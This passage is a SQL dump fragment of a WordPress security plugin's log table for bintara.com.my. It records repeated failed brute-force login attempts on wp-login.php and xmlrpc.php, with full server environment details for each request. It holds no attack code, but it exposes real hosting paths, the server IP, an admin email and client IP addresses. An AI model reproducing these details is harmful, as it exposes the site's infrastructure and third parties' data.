22:36:35',18256768,19556600,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.58.179'),(23951,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"34630\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6-iOesTgPVjZVPWmswKgAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568587656.95\";s:12:\"REQUEST_TIME\";s:10:\"1568587656\";}}','notice','2019-09-15 22:47:38','2019-09-15 22:47:37',17739320,19229104,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(23952,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"35194\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6-i97nxogXZmwWoWHjjAAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568587659.7301\";s:12:\"REQUEST_TIME\";s:10:\"1568587659\";}}','notice','2019-09-15 22:47:41','2019-09-15 22:47:40',18255456,19555416,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.134.39'),(23953,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"38754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7CfOesTgPVjZVPWmsxZQAAANQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568588413.0721\";s:12:\"REQUEST_TIME\";s:10:\"1568588413\";}}','notice','2019-09-15 23:00:14','2019-09-15 23:00:13',17739328,19229984,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(23954,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"39052\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7Cf97nxogXZmwWoWHlyAAAAIw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568588415.5135\";s:12:\"REQUEST_TIME\";s:10:\"1568588415\";}}','notice','2019-09-15 23:00:17','2019-09-15 23:00:15',18255008,19553752,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.226.14'),(23955,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"39644\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7H5r1rBLb0GV3O7mTF5QAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568589798.8652\";s:12:\"REQUEST_TIME\";s:10:\"1568589798\";}}','notice','2019-09-15 23:23:20','2019-09-15 23:23:19',17737744,19230592,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(23956,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"40206\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7H6eesTgPVjZVPWmsy3wAAAMk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568589802.0681\";s:12:\"REQUEST_TIME\";s:10:\"1568589802\";}}','notice','2019-09-15 23:23:23','2019-09-15 23:23:22',18257816,19557000,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(23957,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"49646\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7KoeBXE2JRepjOtvl9fgAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568590497.582\";s:12:\"REQUEST_TIME\";s:10:\"1568590497\";}}','notice','2019-09-15 23:34:58','2019-09-15 23:34:57',17737632,19228560,'https://bintara.com.my/wp-login.php',1,0,'128.199.155.15'),(23958,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"49878\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7Ko@BXE2JRepjOtvl9gQAAABY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568590499.4916\";s:12:\"REQUEST_TIME\";s:10:\"1568590499\";}}','notice','2019-09-15 23:35:00','2019-09-15 23:34:59',18256640,19556600,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.155.15'),(23959,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.164.122.1\";s:11:\"REMOTE_PORT\";s:5:\"43098\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7Na@BXE2JRepjOtvl-jwAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568591211.966\";s:12:\"REQUEST_TIME\";s:10:\"1568591211\";}}','notice','2019-09-15 23:46:54','2019-09-15 